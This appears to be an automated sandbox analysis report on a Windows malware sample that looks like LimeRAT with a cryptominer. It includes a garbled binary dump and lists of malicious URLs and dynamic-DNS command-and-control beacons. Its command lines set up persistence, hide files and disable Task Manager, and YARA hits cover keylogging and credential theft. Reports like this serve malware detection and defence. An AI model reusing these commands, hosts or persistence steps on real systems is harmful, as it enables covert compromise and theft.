InternetReadFile May 2, 2022, 8:57 a.m.	buffer: MZÿÿ¸@ º´ Í!¸LÍ!This program cannot be run in DOS mode. $É]Ö~§Ö~§Ö~§bâVÛ~§bâTZ~§bâUÎ~§HÞ`×~§í ¤À~§í £Å~§í ¢ú~§ß$Ü~§ß4Ó~§Ö~¦Ý§A ¢æ~§A §×~§D X×~§A ¥×~§RichÖ~§PEL±[àê¢IÕ@À@°4ä<ÀÐß ÜÀnT@\4 .text$éê `.rdataî@@.data @À.gfidsè°@@.rsrcÐßÀà@@.relocÜ x@B¹ ËCé&M¹èËCéù[¹ÔËCè{¶hÜøBè«ÀYÃhæøBèÀYÃè&à£hDÃhtDÿÄChðøBè}ÀYÃ¹Dé¦ô¹ðæDèkËhüøBè]ÀYÃ¹úWEèUËhùBèGÀYÃ¹*ADè?ËhùBè1ÀYÃ¹0BDèsIhùBèÀYÃÌÌÌÌÌÌìXUVW¼$tt$dÿt.ÆWPèÆPèt$rW4FVèì VèÄ4FÆh¢èA¾PVèÌ Vèè hàC4FÆVèµ VèÑ 3ÉjXfLFD$(^VQPèfË$Ä$¼$x¬$p=$ªCD$¡¤ËCD$D$dD$$lD$<D$t$l$(ÇD$,ÇD$@PtÿªCëÿ×ðöu/ÿ ªC=0u 3À8$xfED$PtÿªCëÿ×ðö_^À]ÄXÂUìì,EüPÿhªCÀt2Àë\E3ÉEÜÔýÿÿEäEEèEÜWPMàÇEìAMðMôÿlªCøÿu2ÀëVÿuWÿpªCMüðWQÿR3Àö^À_å]Â¶D$Pÿt$ÿt$ÿD«CPÿ@«CÂ¶D$÷ØÀà Pÿt$ÿt$ÿD«CPÿL«CÂUì}0tY}u]E ¹ÔËC$¶ÀPÿuÿuèºöE t>ÿuÿ8«CÀt1h!0PÿD«CÀt!öE thäCPÿ<«Cë ÿu¹ÔËCè¹2À]ÂUììLEM´eøEüEE´ÇEôè½ìå]ÂVÿt$ñ3ÀFFFFèXÆ^Â¸ôBèR¸QSVñuðè 3ÛÇèC$]üèôJè ÆEüè®"Ð!Ô!èKÈEè@9]ÆEüÀ¼!¸!Àt#h°è·YEÆEüÀt ÈèòëÃëE¼!aÀ!ÿÄ!ÿÈ!ÿj@F"SPÇ l¤l¨l°lÐ!Ô!¬lf´lØ!llllèÈj4H"SPèÈj ESPèöÇMôÄ$Èl3ÀÐlÔlØlÜlàlälfêlÆÆlèlà!^[d å]ÂQ3À$ $(,08<@DHLÁYÃUìd¡jÿhöBPd%Vñ>t~t ÿvÿ6è¬Èÿ6è YMôd ^å]ÃUìd¡jÿhöBPd%Vñ>t~t FÀPÿ6èbÈÿ6è= YMôd ^å]ÃVñ¾¸!ÇèCt W¾¼!ÿtÏè¦h°Wè£µYY_èUè2ÿÿÿ 2è'ÿÿÿè è¬$èIÎ^éu\|Á éþþÿÿUìd¡jÿhöBPd%VñÿPÀtjÿvÿvÿPMôd ^å]ÃVñèCÿÿÿöD$t hð\|VèµYYÆ^ÂD$VñFN;NFSU½èËCWÀt;ÈvPhCUè£UÄÍèÑUF^ÁèÀ F;ØwØ~St:èûøYÿuÍè¢U>t8ÿvÿ6WèÈÆÄÿvÿ6èéÆÿ6èÄYëÿ6èÊøYYÿuÍèeU>_]^[^ÂD$VñFN;N¦FSU½èËCWÀt;ÈvPhCUèìTÄÍèUF^ÁèÀ F;ØwØ~Pt@èAøYÿuÍèèT>t>FÀPÿ6WèÆFÄÀPÿ6è)Æÿ6èYëÿ6è øYYÿuÍè¥T>_]^[^ÂD$;Av+APè.ÿÿÿëAÂVÿt$ñèÀu8µluFPj9èúÿÿj¹èËCèT^Â¹¬lT$tÂ÷Ð@àÐ¹ luÂëÂÂÂ¸öBè³ìWù¿¦lu2ÀéS}äÿPEìUð3ÛÏ]ü8$"t0°lÀSSPÿRÏè ÀtE¿Ü!uu<E9XÃë1V7SèÍRPÏÿVh`CÏèò#^ÀtÿuÏèÀt³MäèýÿÿÃ[Mô_d å]Â¸±ôBèT²ì$SVWù3Ûj·ø!V¬l´lÿPøt2ÀéCjV°lèPÀt( løÿ7ÏSÿVèÏÓRPÿVéæh MÐè_ùÿÿÏ]üÿPMÔÁðQÿuÐÏEèÿRÈóMìÉMÐÎ9RuJ+ÆPQè×Àt:Mè løu6ö~2ù}-}ì~'EÐ+ÁxRuxSuxFuxXt EìF;ð\|§ë3SSPÏ°lÿR løtøuø!jQÏÿPMÐ9°lu è úÿÿéâþÿÿMüÿèúÿÿ løuGPj<èEøÿÿé¾þÿÿøu.·ÿ!jVÏÿPø þÿÿ>þÿÿÇ"ë Ç"Ï]óèâÀÀEò<u>]óÏè÷Ü!øÑ¿à!t ø¿Ïè¤ÀÀEò<tÅEóµlÉt }þÿÿ¿´luÀuÉuGPjè\|÷ÿÿ}ðýÿÿ}ò$"¦lû¿à!t ¿¬låÏ}ÔÿPEÜUàl·l request_handle: 0x0000000000cc000c	1	1	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW May 2, 2022, 8:57 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW May 2, 2022, 8:57 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (23 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW May 2, 2022, 8:57 a.m.	snapshot_handle: 0x000000000000026c process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x0000000000000270 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x0000000000000274 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x0000000000000278 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x000000000000025c process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x0000000000000290 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x0000000000000294 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x0000000000000298 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x000000000000029c process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002a0 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002a4 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002a8 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002ac process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002b0 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x0000000000000138 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002bc process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002c0 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002c4 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002c8 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002cc process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002d0 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002d4 process_name: conhost.exe process_identifier: 2576		0	0
Process32NextW May 2, 2022, 8:58 a.m.	snapshot_handle: 0x00000000000002d8 process_name: conhost.exe process_identifier: 2576		0	0

Potentially malicious URLs were found in the process memory dump (50 out of 130 events)

url	https://pastebin.com/raw/DVn2TV4Q
url	http://54.254.238.33
url	https://pastebin.com/raw/GUqDzHQW
url	https://pastebin.com/raw/h6SvjTQp
url	http://crl.comodo.net/TrustedCertificateServices.crl0
url	http://users.ocsp.d-trust.net03
url	http://crl.ssc.lt/root-b/cacrl.crl0
url	http://crl.securetrust.com/STCA.crl0
url	http://crl.securetrust.com/SGCA.crl0
url	http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
url	http://www.ssc.lt/cps03
url	http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
url	http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
url	http://www.microsoft.com/pki/certs/TrustListPCA.crt0
url	https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
url	http://www.microsoft.com/pki/crl/products/TrustListPCA.crl
url	http://www.pkioverheid.nl/policies/root-policy0
url	http://cps.chambersign.org/cps/chambersroot.html0
url	http://www.e-szigno.hu/SZSZ/0
url	http://www.entrust.net/CRL/Client1.crl0
url	http://crl.chambersign.org/publicnotaryroot.crl0
url	https://xmrig.com/wizard
url	http://www.certplus.com/CRL/class3.crl0
url	http://logo.verisign.com/vslogo.gif0
url	http://www.acabogacia.org/doc0
url	http://www.disig.sk/ca/crl/ca_disig.crl0
url	https://www.catcert.net/verarrel
url	http://www.sk.ee/cps/0
url	http://www.quovadis.bm0
url	https://www.catcert.net/verarrel05
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
url	https://L
url	http://crl.chambersign.org/chambersroot.crl0
url	https://H
url	http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
url	http://crl.globalsign.net/root-r2.crl0
url	http://certificates.starfieldtech.com/repository/1604
url	http://www.d-trust.net0
url	http://crl.comodo.net/AAACertificateServices.crl0
url	http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
url	http://crl.ssc.lt/root-a/cacrl.crl0
url	http://crl.usertrust.com/UTN-DATACorpSGC.crl0
url	http://www.certicamara.com/certicamaraca.crl0
url	http://www.d-trust.net/crl/d-trust_root_class_2_ca_2007.crl0
url	http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
url	http://www.post.trust.ie/reposit/cps.html0
url	http://www.d-trust.net/crl/d-trust_qualified_root_ca_1_2007_pn.crl0
url	http://www2.public-trust.com/crl/ct/ctroot.crl0
url	http://www.certicamara.com0

Yara rule detected in process memory (50 out of 335 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Take ScreenShot	rule	ScreenShot
description	Communications use DNS	rule	Network_DNS
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Steal credential	rule	local_credential_Steal
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	File Downloader	rule	Network_Downloader
description	Escalate priviledges	rule	Escalate_priviledges
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Create a windows service	rule	Create_Service
description	Communication using DGA	rule	Network_DGA
description	Communications over RAW Socket	rule	Network_TCP_Socket

Uses Windows utilities for basic Windows functionality (31 events)

cmdline	attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector"
cmdline	cmd /c del "C:\Users\test22\AppData\Local\Temp\hosting.bat"
cmdline	wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
cmdline	cmd /c del "C:\Windows (x86)\version.bat"
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
cmdline	wmic process where name='windowsapp.exe' delete
cmdline	schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe'"
cmdline	C:\Windows\System32\cmd /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
cmdline	wmic csproduct get UUID /format:list
cmdline	wmic process where name='taskmgr.exe' delete
cmdline	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
cmdline	wmic process where name='xmrig.exe' delete
cmdline	attrib -s -h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\."
cmdline	wmic process where name='Taskmgr.exe' delete
cmdline	cmd /c del "C:\Users\test22\AppData\Local\Temp\version.bat"
cmdline	attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates"
cmdline	attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\."
cmdline	C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list \|find "="
cmdline	wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
cmdline	attrib +s +h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\."
cmdline	REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
cmdline	"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
cmdline	wmic process where name='xagal.exe' delete
cmdline	C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
cmdline	REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
cmdline	cmd /c del "C:\Users\test22\AppData\Local\Temp\versioncd.bat"
cmdline	cmd /c del "C:\Windows (x86)\xcls.bat"
cmdline	attrib -s -h "C:\Windows (x86)\."
cmdline	ping 127.0.0.1 -n 5
cmdline	C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
cmdline	attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector\."

Executes one or more WMI queries which can be used to identify virtual machines (1 event)

wmi	select * from win32_logicaldisk

Communicates with host for which no DNS query was performed (1 event)

host

54.254.238.33

Wscript.exe initiated network communications indicative of a script based payload download (50 out of 134 events)

Time & API	Arguments	Status	Return
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.ddns.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.ddnsking.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.3utilities.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.bounceme.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.freedynamicdns.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.freedynamicdns.org:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:57 a.m.	url: http://niogem1171.gotdns.ch:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:57 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.hopto.org:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.myftp.biz:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.myftp.org:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.myvnc.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.onthewifi.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.redirectme.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servebeer.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.serveblog.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servecounterstrike.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.serveftp.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servegame.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servehttp.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servehalflife.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.serveirc.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.serveminecraft.net:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servemp3.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servequake.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356
InternetCrackUrlW May 2, 2022, 8:58 a.m.	url: http://niogem1171.servepics.com:16039/is-ready flags: 0	1	1
HttpOpenRequestW May 2, 2022, 8:58 a.m.	connect_handle: 0x0000000000cc0008 http_version: flags: 73400320 http_method: POST referer: path: /is-ready	1	13369356

Installs itself for autorun at Windows startup (50 out of 148 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Logons	reg_value	C:\Windows (x86)\explorer.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows Updates	reg_value	C:\Users\test22\AppData\Roaming\AppData\Windows Updates\winupdate.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\helps	reg_value	"C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\helps	reg_value	"C:\Users\test22\AppData\Local\Temp\helps.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\z	reg_value	"C:\Users\test22\AppData\Local\Temp\z.vbs"
